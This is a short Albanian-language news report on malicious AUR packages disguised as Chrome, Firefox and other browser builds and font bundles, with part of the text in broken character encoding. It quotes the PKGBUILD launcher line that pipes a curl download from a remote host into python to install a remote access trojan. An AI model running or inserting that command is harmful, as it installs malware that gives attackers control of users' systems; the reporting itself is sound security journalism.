Në depozitarin AUR (Arch User Repository), i përdorur në Arch Linux për shpërndarjen e pakove nga zhvillues të tjerë, vazhdoi publikimi i kodit të keq, i integruar në pakot me ndërtimet jozyrtare të shfletuesve. Përveç pakove të dëmshme firefox-patch-bin, librewolf-fix-bin dhe zen-browser-patched-bin, që u identifikuan para dy javësh, në AUR u shtua paketa google-chrome-stable, e cila gjithashtu përmban një ndryshim që vendos një komponent të dëmshëm, duke ofruar akses të largët në sistem.
Në skedarin PKGBUILD të paketës problematike u identifikua vendosja e një skripti për të ekzekutuar shfletuesin google-chrome-stable.sh, ku ndër të tjera përmbante komandën 'python -c "$(curl https://segs.lol/9wUb1Z)"', e cila shkarkonte softuer të dëmshëm, i njohur nga shërbimi VirusTotal si Trojan Spark, i cili lejon menaxhimin e sistemit në distancë, nisjen e proceseve, transferimin e skedarëve, inspektimin e trafikut dhe dërgimin e fotografive të ekranit.
PaketĂ«n e dĂ«mshme google-chrome-stable e kishin shkarkuar dy ditĂ« mĂ« parĂ« dhe u eliminua nga administratorĂ«t e AUR pas pak orĂ«sh nga shfaqja e saj. Pothuajse menjĂ«herĂ« pas heqjes sĂ« google-chrome-stable nĂ« AUR u ngarkuan dy paketa tĂ« tjera tĂ« dĂ«mshme â 'chrome' dhe 'chrome-bin', tĂ« cilat pĂ«rmbanin njĂ« skenar tĂ« ngjashĂ«m pĂ«r vendosjen e softuerit tĂ« dĂ«mshĂ«m nĂ« sistemin e pĂ«rdoruesit.
Më pas u identifikuan edhe tri paketa të tjera me kod të keq: ttf-mac-fonts-all, ttf-ms-fonts-all dhe gromit.
Burimi: opennet.ru
